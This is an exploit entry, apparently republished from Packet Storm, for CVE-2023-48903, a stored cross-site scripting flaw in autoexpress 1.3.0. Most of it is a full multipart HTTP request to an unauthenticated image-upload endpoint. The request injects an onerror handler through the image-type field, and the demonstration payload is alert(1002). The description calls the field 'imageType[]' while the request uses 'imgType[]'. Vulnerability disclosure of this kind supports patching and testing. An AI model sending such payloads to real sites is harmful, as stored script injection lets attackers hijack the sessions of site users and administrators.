Share
## https://sploitus.com/exploit?id=PACKETSTORM:177662
# Exploit Title: tramyardg autoexpress - Stored Cross-Site Scripting (XSS)  
# Google Dork: N/A  
# Date: 11/28/2023  
# Exploit Author: Scott White  
# Vendor Homepage: https://github.com/tramyardg/autoexpress  
# Version: v1.3.0  
# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52  
# CVE : CVE-2023-48903  
  
# References:  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48903  
https://www.cve.org/CVERecord?id=CVE-2023-48903  
  
# Description:  
Autoexpress 1.3.0 is affected by a stored cross-site scripting (XSS) feature that allows for an unauthenticated attacker to execute JavaScript commands.  
  
# Proof of Concept:  
+ Go to "http://localhost/autoexpress"  
+ Craft POST request to /autoexpress/admin/api/uploadCarImages.php within BurpSuite (Repeater)  
+ The form-data name "imageType[]" is vulnerable  
  
# Sample Request  
POST /autoexpress/admin/api/uploadCarImages.php HTTP/1.1  
Host: localhost  
Content-Length: 17016  
Accept: application/json, text/javascript, */*; q=0.01  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9juDWgTa5YsjE2YR  
Origin: http://localhost  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
------WebKitFormBoundary9juDWgTa5YsjE2YR  
Content-Disposition: form-data; name="files[]"; filename="image.jpeg"  
Content-Type: image/jpeg  
  
IMAGE_CONTENT  
  
------WebKitFormBoundary9juDWgTa5YsjE2YR  
Content-Disposition: form-data; name="id"  
  
CAR_ID  
  
------WebKitFormBoundary9juDWgTa5YsjE2YR  
Content-Disposition: form-data; name="fd[]"  
  
IMAGE_CONTENT_BASE64_ENCODED  
  
------WebKitFormBoundary9juDWgTa5YsjE2YR  
  
Content-Disposition: form-data; name="imgType[]"  
  
data:image/jpeg;base64"onerror=alert(1002)<!--------WebKitFormBoundary9juDWgTa5YsjE2YR--